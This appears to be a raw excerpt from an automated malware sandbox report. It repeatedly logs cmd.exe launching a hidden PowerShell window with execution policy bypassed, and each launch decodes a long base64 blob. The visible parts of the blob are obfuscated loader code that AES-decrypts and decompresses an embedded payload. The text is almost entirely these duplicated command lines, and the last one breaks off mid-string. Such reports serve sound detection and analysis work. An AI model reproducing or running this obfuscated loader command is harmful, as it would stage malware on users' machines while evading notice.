"[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0fJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0fJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0fJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0fJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3fl